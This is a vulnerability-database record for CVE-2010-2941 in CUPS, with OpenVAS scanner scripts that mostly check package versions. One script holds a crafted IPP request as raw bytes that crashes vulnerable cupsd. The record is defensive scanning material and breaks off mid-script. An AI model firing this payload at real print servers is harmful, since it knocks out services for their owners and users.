{"cve": [{"lastseen": "2017-08-17T11:14:54", "bulletinFamily": "NVD", "description": "ipp.c in cupsd in CUPS 1.4.4 and earlier does not properly allocate memory for attribute values with invalid string data types, which allows remote attackers to cause a denial of service (use-after-free and application crash) or possibly execute arbitrary code via a crafted IPP request.", "modified": "2017-08-16T21:32:52", "published": "2010-11-05T13:00:01", "id": "CVE-2010-2941", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2010-2941", "title": "CVE-2010-2941", "type": "cve", "cvss": {"score": 7.9, "vector": "AV:ADJACENT_NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "openvas": [{"lastseen": "2017-07-24T12:50:54", "bulletinFamily": "scanner", "description": "The remote host is missing an update as announced\nvia advisory SSA:2010-333-01.", "modified": "2017-07-07T00:00:00", "published": "2012-09-11T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=68672", "id": "OPENVAS:68672", "title": "Slackware Advisory SSA:2010-333-01 cups ", "type": "openvas", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: esoft_slk_ssa_2010_333_01.nasl 6598 2017-07-07 09:36:44Z cfischer $\n# Description: Auto-generated from the corresponding slackware advisory\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2012 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"New cups packages are available for Slackware 12.0, 12.1, 12.2, 13.0, 13.1,\nand -current to fix security issues.\";\ntag_summary = \"The remote host is missing an update as announced\nvia advisory SSA:2010-333-01.\";\n\ntag_solution = \"https://secure1.securityspace.com/smysecure/catid.html?in=SSA:2010-333-01\";\n \nif(description)\n{\n script_id(68672);\n script_tag(name:\"creation_date\", value:\"2012-09-11 01:34:21 +0200 (Tue, 11 Sep 2012)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-07 11:36:44 +0200 (Fri, 07 Jul 2017) $\");\n script_cve_id(\"CVE-2010-2941\");\n script_tag(name:\"cvss_base\", value:\"7.9\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:A/AC:M/Au:N/C:C/I:C/A:C\");\n script_version(\"$Revision: 6598 $\");\n script_name(\"Slackware Advisory SSA:2010-333-01 cups \");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2012 E-Soft Inc. 
http://www.securityspace.com\");\n script_family(\"Slackware Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/slackware_linux\", \"ssh/login/slackpack\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-slack.inc\");\nvuln = 0;\nif(isslkpkgvuln(pkg:\"cups\", ver:\"1.3.11-i486-1_slack12.0\", rls:\"SLK12.0\")) {\n vuln = 1;\n}\nif(isslkpkgvuln(pkg:\"cups\", ver:\"1.3.11-i486-1_slack12.1\", rls:\"SLK12.1\")) {\n vuln = 1;\n}\nif(isslkpkgvuln(pkg:\"cups\", ver:\"1.3.11-i486-1_slack12.2\", rls:\"SLK12.2\")) {\n vuln = 1;\n}\nif(isslkpkgvuln(pkg:\"cups\", ver:\"1.3.11-i486-2_slack13.0\", rls:\"SLK13.0\")) {\n vuln = 1;\n}\nif(isslkpkgvuln(pkg:\"cups\", ver:\"1.4.5-i486-1_slack13.1\", rls:\"SLK13.1\")) {\n vuln = 1;\n}\n\nif(vuln) {\n security_message(0);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 7.9, "vector": "AV:ADJACENT_NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-09-02T00:05:29", "bulletinFamily": "scanner", "description": "This host is running CUPS and is prone to Denial of Service vulnerability.", "modified": "2018-06-25T00:00:00", "published": "2010-11-18T00:00:00", "id": "OPENVAS:1361412562310800182", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310800182", "title": "CUPS IPP Use-After-Free Denial of Service Vulnerability", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_cupsd_ipp_use_after_free_dos_vuln.nasl 10317 2018-06-25 14:09:46Z cfischer $\n#\n# CUPS IPP Use-After-Free Denial of Service 
Vulnerability\n#\n# Authors:\n# Veerendra G.G <veerendragg@secpod.com>\n#\n# Copyright:\n# Copyright (c) 2010 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:apple:cups\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.800182\");\n script_version(\"$Revision: 10317 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-06-25 16:09:46 +0200 (Mon, 25 Jun 2018) $\");\n script_tag(name:\"creation_date\", value:\"2010-11-18 06:30:08 +0100 (Thu, 18 Nov 2010)\");\n script_bugtraq_id(44530);\n script_cve_id(\"CVE-2010-2941\");\n script_tag(name:\"cvss_base\", value:\"7.9\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:A/AC:M/Au:N/C:C/I:C/A:C\");\n script_name(\"CUPS IPP Use-After-Free Denial of Service Vulnerability\");\n script_category(ACT_DENIAL);\n script_copyright(\"Copyright (c) 2010 Greenbone Networks GmbH\");\n script_family(\"Denial of Service\");\n script_dependencies(\"secpod_cups_detect.nasl\");\n script_require_ports(\"Services/www\", 631);\n script_mandatory_keys(\"CUPS/installed\");\n\n script_xref(name:\"URL\", value:\"http://xforce.iss.net/xforce/xfdb/62882\");\n script_xref(name:\"URL\", value:\"https://bugzilla.redhat.com/show_bug.cgi?id=624438\");\n\n 
script_tag(name:\"impact\", value:\"Successful exploitation will let the remote unauthenticated attackers to\n cause a denial of service (use-after-free and application crash) or possibly\n execute arbitrary code via a crafted IPP request.\n\n Impact Level: Application\");\n\n script_tag(name:\"affected\", value:\"CUPS 1.4.4 and prior\");\n\n script_tag(name:\"insight\", value:\"The flaw is caused by improper allocation of memory for attribute values\n with invalid string data type.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to 1.4.5 or above,\n For updates refer to http://www.cups.org/software.php\");\n\n script_tag(name:\"summary\", value:\"This host is running CUPS and is prone to Denial of Service vulnerability.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"remote_vul\");\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"http_func.inc\");\n\nif( ! port = get_app_port( cpe:CPE ) ) exit( 0 );\nhost = http_host_name( port:port );\n\nif( ! 
soc = open_sock_tcp( port ) ) exit( 0 );\n\npost_data = string( 'POST /ipp/ HTTP/1.1\\r\\n',\n 'Host: ' + host + '\\r\\n',\n 'User-Agent: CUPS/1.3.4\\r\\n',\n 'Content-Type: application/ipp\\r\\n',\n 'Content-Length: 289\\r\\n',\n 'Expect: 100-continue\\r\\n\\r\\n'\n );\n\nraw_data = raw_string( 0x01, 0x01, 0x00, 0x0b, 0x00, 0x00, 0x00, 0x01, 0x01,\n 0x47, 0x00, 0x12, 0x61, 0x74, 0x74, 0x72, 0x69, 0x62,\n 0x75, 0x74, 0x65, 0x73, 0x2d, 0x63, 0x68, 0x61, 0x72,\n 0x73, 0x65, 0x74, 0x00, 0x05, 0x75, 0x74, 0x66, 0x2d,\n 0x38, 0x48, 0x00, 0x1b, 0x61, 0x74, 0x74, 0x72, 0x69,\n 0x62, 0x75, 0x74, 0x65, 0x73, 0x2d, 0x6e, 0x61, 0x74,\n 0x75, 0x72, 0x61, 0x6c, 0x2d, 0x6c, 0x61, 0x6e, 0x67,\n 0x75, 0x61, 0x67, 0x65, 0x00, 0x05, 0x65, 0x6e, 0x2d,\n 0x75, 0x73, 0x45, 0x00, 0x0b, 0x70, 0x72, 0x69, 0x6e,\n 0x74, 0x65, 0x72, 0x2d, 0x75, 0x72, 0x69, 0x00, 0x1b,\n 0x69, 0x70, 0x70, 0x3a, 0x2f, 0x2f, 0x31, 0x30, 0x2e,\n 0x31, 0x30, 0x2e, 0x31, 0x30, 0x2e, 0x32, 0x35, 0x31,\n 0x3a, 0x36, 0x33, 0x31, 0x2f, 0x69, 0x70, 0x70, 0x2f,\n 0x38, 0x00, 0x14, 0x72, 0x65, 0x71, 0x75, 0x65, 0x73,\n 0x74, 0x65, 0x64, 0x2d, 0x61, 0x74, 0x74, 0x72, 0x69,\n 0x62, 0x75, 0x74, 0x65, 0x73, 0x00, 0x10, 0x63, 0x6f,\n 0x70, 0x69, 0x65, 0x73, 0x2d, 0x73, 0x75, 0x70, 0x70,\n 0x6f, 0x72, 0x74, 0x65, 0x64, 0x44, 0x00, 0x00, 0x00,\n 0x19, 0x64, 0x6f, 0x63, 0x75, 0x6d, 0x65, 0x6e, 0x74,\n 0x2d, 0x66, 0x6f, 0x72, 0x6d, 0x61, 0x74, 0x2d, 0x73,\n 0x75, 0x70, 0x70, 0x6f, 0x72, 0x74, 0x65, 0x64, 0x44,\n 0x00, 0x00, 0x00, 0x19, 0x70, 0x72, 0x69, 0x6e, 0x74,\n 0x65, 0x72, 0x2d, 0x69, 0x73, 0x2d, 0x61, 0x63, 0x63,\n 0x65, 0x70, 0x74, 0x69, 0x6e, 0x67, 0x2d, 0x6a, 0x6f,\n 0x62, 0x73, 0x44, 0x00, 0x00, 0x00, 0x0d, 0x70, 0x72,\n 0x69, 0x6e, 0x74, 0x65, 0x72, 0x2d, 0x73, 0x74, 0x61,\n 0x74, 0x65, 0x44, 0x00, 0x00, 0x00, 0x15, 0x70, 0x72,\n 0x69, 0x6e, 0x74, 0x65, 0x72, 0x2d, 0x73, 0x74, 0x61,\n 0x74, 0x65, 0x2d, 0x6d, 0x65, 0x73, 0x73, 0x61, 0x67,\n 0x65, 0x44, 0x00, 0x00, 0x00, 0x15, 0x70, 0x72, 0x69,\n 0x6e, 0x74, 0x65, 
0x72, 0x2d, 0x73, 0x74, 0x61, 0x74,\n 0x65, 0x2d, 0x72, 0x65, 0x61, 0x73, 0x6f, 0x6e, 0x73,\n 0x03\n );\n\nsend( socket:soc, data:post_data );\nsend( socket:soc, data:raw_data );\n\nclose( soc );\nsleep( 5 );\n\nsoc = open_sock_tcp( port );\nif( ! soc ) {\n security_message( port:port );\n exit( 0 );\n}\n\nclose( soc );\nexit( 99 );\n", "cvss": {"score": 7.9, "vector": "AV:ADJACENT_NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-09-28T18:24:35", "bulletinFamily": "scanner", "description": "Oracle Linux Local Security Checks ELSA-2010-0866", "modified": "2018-09-28T00:00:00", "published": "2015-10-06T00:00:00", "id": "OPENVAS:1361412562310122252", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310122252", "title": "Oracle Linux Local Check: ELSA-2010-0866", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: ELSA-2010-0866.nasl 11688 2018-09-28 13:36:28Z cfischer $\n#\n# Oracle Linux Local Check\n#\n# Authors:\n# Eero Volotinen <eero.volotinen@solinor.com>\n#\n# Copyright:\n# Copyright (c) 2015 Eero Volotinen, http://solinor.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.122252\");\n script_version(\"$Revision: 11688 $\");\n script_tag(name:\"creation_date\", value:\"2015-10-06 14:15:29 +0300 (Tue, 06 Oct 2015)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-09-28 15:36:28 +0200 (Fri, 28 Sep 2018) $\");\n script_name(\"Oracle Linux Local Check: ELSA-2010-0866\");\n script_tag(name:\"insight\", value:\"ELSA-2010-0866 - cups security update. Please see the references for more insight.\");\n script_tag(name:\"solution\", value:\"Update the affected packages to the latest available version.\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"summary\", value:\"Oracle Linux Local Security Checks ELSA-2010-0866\");\n script_xref(name:\"URL\", value:\"http://linux.oracle.com/errata/ELSA-2010-0866.html\");\n script_cve_id(\"CVE-2010-2941\");\n script_tag(name:\"cvss_base\", value:\"7.9\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:A/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/oracle_linux\", \"ssh/login/release\", re:\"ssh/login/release=OracleLinux6\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Eero Volotinen\");\n script_family(\"Oracle Linux Local Security Checks\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"OracleLinux6\")\n{\n if ((res = isrpmvuln(pkg:\"cups\", rpm:\"cups~1.4.2~35.el6_0.1\", rls:\"OracleLinux6\")) 
!= NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"cups-devel\", rpm:\"cups-devel~1.4.2~35.el6_0.1\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"cups-libs\", rpm:\"cups-libs~1.4.2~35.el6_0.1\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"cups-lpd\", rpm:\"cups-lpd~1.4.2~35.el6_0.1\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"cups-php\", rpm:\"cups-php~1.4.2~35.el6_0.1\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n\n}\nif (__pkg_match) exit(99);\n exit(0);\n\n", "cvss": {"score": 7.9, "vector": "AV:ADJACENT_NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-09-02T00:00:40", "bulletinFamily": "scanner", "description": "The remote host is missing an update as announced\nvia advisory SSA:2010-333-01.", "modified": "2018-04-06T00:00:00", "published": "2012-09-11T00:00:00", "id": "OPENVAS:136141256231068672", "href": "http://plugins.openvas.org/nasl.php?oid=136141256231068672", "title": "Slackware Advisory SSA:2010-333-01 cups ", "type": "openvas", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: esoft_slk_ssa_2010_333_01.nasl 9352 2018-04-06 07:13:02Z cfischer $\n# Description: Auto-generated from the corresponding slackware advisory\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2012 E-Soft Inc. 
http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"New cups packages are available for Slackware 12.0, 12.1, 12.2, 13.0, 13.1,\nand -current to fix security issues.\";\ntag_summary = \"The remote host is missing an update as announced\nvia advisory SSA:2010-333-01.\";\n\ntag_solution = \"https://secure1.securityspace.com/smysecure/catid.html?in=SSA:2010-333-01\";\n \nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.68672\");\n script_tag(name:\"creation_date\", value:\"2012-09-11 01:34:21 +0200 (Tue, 11 Sep 2012)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-04-06 09:13:02 +0200 (Fri, 06 Apr 2018) $\");\n script_cve_id(\"CVE-2010-2941\");\n script_tag(name:\"cvss_base\", value:\"7.9\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:A/AC:M/Au:N/C:C/I:C/A:C\");\n script_version(\"$Revision: 9352 $\");\n script_name(\"Slackware Advisory SSA:2010-333-01 cups \");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2012 E-Soft Inc. 
http://www.securityspace.com\");\n script_family(\"Slackware Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/slackware_linux\", \"ssh/login/slackpack\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-slack.inc\");\nvuln = 0;\nif(isslkpkgvuln(pkg:\"cups\", ver:\"1.3.11-i486-1_slack12.0\", rls:\"SLK12.0\")) {\n vuln = 1;\n}\nif(isslkpkgvuln(pkg:\"cups\", ver:\"1.3.11-i486-1_slack12.1\", rls:\"SLK12.1\")) {\n vuln = 1;\n}\nif(isslkpkgvuln(pkg:\"cups\", ver:\"1.3.11-i486-1_slack12.2\", rls:\"SLK12.2\")) {\n vuln = 1;\n}\nif(isslkpkgvuln(pkg:\"cups\", ver:\"1.3.11-i486-2_slack13.0\", rls:\"SLK13.0\")) {\n vuln = 1;\n}\nif(isslkpkgvuln(pkg:\"cups\", ver:\"1.4.5-i486-1_slack13.1\", rls:\"SLK13.1\")) {\n vuln = 1;\n}\n\nif(vuln) {\n security_message(0);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 7.9, "vector": "AV:ADJACENT_NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-01-06T13:05:02", "bulletinFamily": "scanner", "description": "Check for the Version of cups", "modified": "2018-01-03T00:00:00", "published": "2010-12-02T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310862590", "id": "OPENVAS:1361412562310862590", "type": "openvas", "title": "Fedora Update for cups FEDORA-2010-17641", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for cups FEDORA-2010-17641\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2010 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free 
software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_affected = \"cups on Fedora 14\";\ntag_insight = \"The Common UNIX Printing System provides a portable printing layer for\n UNIX® operating systems. It has been developed by Easy Software Products\n to promote a standard printing solution for all UNIX vendors and users.\n CUPS provides the System V and Berkeley command-line interfaces.\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.fedoraproject.org/pipermail/package-announce/2010-November/050977.html\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.862590\");\n script_version(\"$Revision: 8274 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-01-03 08:28:17 +0100 (Wed, 03 Jan 2018) $\");\n script_tag(name:\"creation_date\", value:\"2010-12-02 08:39:14 +0100 (Thu, 02 Dec 2010)\");\n script_tag(name:\"cvss_base\", value:\"7.9\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:A/AC:M/Au:N/C:C/I:C/A:C\");\n script_xref(name: \"FEDORA\", value: \"2010-17641\");\n script_cve_id(\"CVE-2010-2941\");\n script_name(\"Fedora Update for cups FEDORA-2010-17641\");\n\n script_tag(name: \"summary\" , value: \"Check for the Version of cups\");\n 
script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2010 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"FC14\")\n{\n\n if ((res = isrpmvuln(pkg:\"cups\", rpm:\"cups~1.4.4~11.fc14\", rls:\"FC14\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}", "cvss": {"score": 7.9, "vector": "AV:ADJACENT_NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-01-02T10:53:58", "bulletinFamily": "scanner", "description": "Ubuntu Update for Linux kernel vulnerabilities USN-1012-1", "modified": "2017-12-29T00:00:00", "published": "2010-11-16T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310840531", "id": "OPENVAS:1361412562310840531", "type": "openvas", "title": "Ubuntu Update for cups, cupsys vulnerability USN-1012-1", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_ubuntu_USN_1012_1.nasl 8258 2017-12-29 07:28:57Z teissa $\n#\n# Ubuntu Update for cups, cupsys vulnerability USN-1012-1\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2010 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any 
later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Emmanuel Bouillon discovered that CUPS did not properly handle certain\n Internet Printing Protocol (IPP) packets. A remote attacker could use this\n flaw to cause a denial of service or possibly execute arbitrary code. In\n the default installation in Ubuntu 8.04 LTS and later, attackers would be\n isolated by the CUPS AppArmor profile.\";\n\ntag_summary = \"Ubuntu Update for Linux kernel vulnerabilities USN-1012-1\";\ntag_affected = \"cups, cupsys vulnerability on Ubuntu 6.06 LTS ,\n Ubuntu 8.04 LTS ,\n Ubuntu 9.10 ,\n Ubuntu 10.04 LTS\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\nif(description)\n{\n script_xref(name: \"URL\" , value: \"http://www.ubuntu.com/usn/usn-1012-1/\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.840531\");\n script_version(\"$Revision: 8258 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-12-29 08:28:57 +0100 (Fri, 29 Dec 2017) $\");\n script_tag(name:\"creation_date\", value:\"2010-11-16 14:49:48 +0100 (Tue, 16 Nov 2010)\");\n script_tag(name:\"cvss_base\", value:\"7.9\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:A/AC:M/Au:N/C:C/I:C/A:C\");\n script_xref(name: \"USN\", value: \"1012-1\");\n script_cve_id(\"CVE-2010-2941\");\n script_name(\"Ubuntu Update for cups, cupsys vulnerability USN-1012-1\");\n\n script_category(ACT_GATHER_INFO);\n 
script_copyright(\"Copyright (c) 2010 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\");\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"UBUNTU9.10\")\n{\n\n if ((res = isdpkgvuln(pkg:\"cups-bsd\", ver:\"1.4.1-5ubuntu2.7\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"cups-client\", ver:\"1.4.1-5ubuntu2.7\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"cups-dbg\", ver:\"1.4.1-5ubuntu2.7\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"cups\", ver:\"1.4.1-5ubuntu2.7\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libcups2-dev\", ver:\"1.4.1-5ubuntu2.7\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libcups2\", ver:\"1.4.1-5ubuntu2.7\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libcupscgi1-dev\", ver:\"1.4.1-5ubuntu2.7\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libcupscgi1\", ver:\"1.4.1-5ubuntu2.7\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = 
isdpkgvuln(pkg:\"libcupsdriver1-dev\", ver:\"1.4.1-5ubuntu2.7\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libcupsdriver1\", ver:\"1.4.1-5ubuntu2.7\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libcupsimage2-dev\", ver:\"1.4.1-5ubuntu2.7\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libcupsimage2\", ver:\"1.4.1-5ubuntu2.7\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libcupsmime1-dev\", ver:\"1.4.1-5ubuntu2.7\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libcupsmime1\", ver:\"1.4.1-5ubuntu2.7\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = 